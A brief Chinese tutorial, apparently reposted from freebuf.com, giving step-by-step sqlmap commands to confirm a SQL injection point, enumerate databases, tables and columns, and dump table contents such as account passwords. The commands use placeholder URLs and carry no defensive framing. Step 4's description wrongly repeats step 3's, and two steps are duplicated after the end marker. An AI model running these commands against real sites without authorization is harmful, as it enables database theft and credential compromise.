一次sqlmap注入点并且dump出账号密码全程
判断注入点:sqlmap.py -u “存在注入url”
爆出所有数据库名字:sqlmap.py -u “存在注入url” –dbs
查看当前使用账号:sqlmap.py -u “存在注入url” –current-user
1、查看当前数据库:sqlmap.py -u “存在注入url” –current-db

2、列出数据库中所有表:sqlmap.py -u “存在注入url”-D “当前数据库名” –tables。解释说明:-D是指定数据库名称。
3、列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” –columns。
4、列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” -C “当前表的字段” –dump。

来源:freebuf.com 2020-09-08 21:18:19 by: minggege
正文完
2、列出数据库中所有表:sqlmap.py -u “存在注入url”-D “当前数据库名” –tables。解释说明:-D是指定数据库名称。
3、列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” –columns。